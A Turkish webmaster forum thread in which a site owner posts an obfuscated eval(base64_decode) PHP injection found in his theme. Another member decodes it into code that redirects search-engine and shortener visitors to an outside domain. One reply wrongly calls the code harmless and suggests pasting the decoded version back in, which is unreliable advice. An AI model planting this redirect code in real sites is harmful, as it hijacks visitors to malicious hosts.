0
Kayıt Ol

Bıktım Usandım Bu Şifrelenme İşinden :(

4

359

  • 05-07-2013, 20:23:34
    #1
    SaLeh
    SaLeh
    Arkadaşlar Kurduğum Sitemde tema kendi kendiliğine şifreleniyor...

    Bütün Temaları Normal Olarak Yüklüyorum Kodlarda Hiç bir Değişiklik Yapmıyorum Aradan 1 Kaç Gün Geçince Tema Kodları Şifrelenmiş.....

    Nasıl Önlerim Bunu Bir Yardım Edin...

    Temada Değişen Kod İşte Bu:


    <?php eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQ okcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxt KXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXT sNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0K aWYgKCR1YWcpIHsKaWYgKCFzdHJpc3RyKCR1YWcsIk1TSUUgNy 4wIikgYW5kICFzdHJpc3RyKCR1YWcsIk1TSUUgNi4wIikpewpp ZiAoc3RyaXN0cigkcmVmZXJlciwieWFob28iKSBvciBzdHJpc3 RyKCRyZWZlcmVyLCJiaW5nIikgb3Igc3RyaXN0cigkcmVmZXJl ciwicmFtYmxlciIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIndlYm FsdGEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKSBv ciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIH ByZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8o Lio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2 dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwiZm FjZWJvb2suY29tL2wiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJh b2wuY29tIikpIHsKaWYgKCFzdHJpc3RyKCRyZWZlcmVyLCJjYW NoZSIpIGFuZCAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSBh bmQgIXN0cmlzdHIoJHJlZmVyZXIsIkVlWXAzRDciKSl7CmhlYW RlcigiTG9jYXRpb246IGh0dHA6Ly9vZXByZmEuZGRucy5tZS51 ay8iKTsKZXhpdCgpOw0KfQp9Cn0KfQ0KfQ=="));
  • 05-07-2013, 20:29:05
    #2
    t4ko
    t4ko
    Kodların içinde bulunanlar bunlar;

    Alıntı
    error_reporting(0);
    $qazplm=headers_sent();
    if (!$qazplm){
    $referer=$_SERVER['HTTP_REFERER'];
    $uag=$_SERVER['HTTP_USER_AGENT'];
    if ($uag) {
    if (!stristr($uag,"MSIE 7.0") and !stristr($uag,"MSIE 6.0")){
    if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"webalta") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"facebook.com/l") or stristr($referer,"aol.com")) {
    if (!stristr($referer,"cache") and !stristr($referer,"inurl") and !stristr($referer,"EeYp3D7")){
    header("Location: http://oeprfa.ddns.me.uk/");
    exit();
    }
    }
    }
    }
    }
    Zararlar bir şeye benzemiyor. Base 64'ü silip yerine bunu koyabilirsiniz.
  • 05-07-2013, 20:35:11
    #3
    SaLeh
    SaLeh
    t4ko adlı üyeden alıntı: mesajı görüntüle
    Kodların içinde bulunanlar bunlar;



    Zararlar bir şeye benzemiyor. Base 64'ü silip yerine bunu koyabilirsiniz.

    Hocam iyi güzelde ben değiştirsem yeniden eski şifrelenmiş hale geliyor.
  • 05-07-2013, 20:35:37
    #4
    Metallica
    Metallica
    google facebook vb yerlerden gelen hitleri kendine gönderiyor sunucuda shell taraması yapılmasını iste birde uzman birinden yazılımdaki açıkları incelet.
  • 05-07-2013, 20:38:59
    #5
    Talha
    Talha
    chmod ayarını 644 yap ?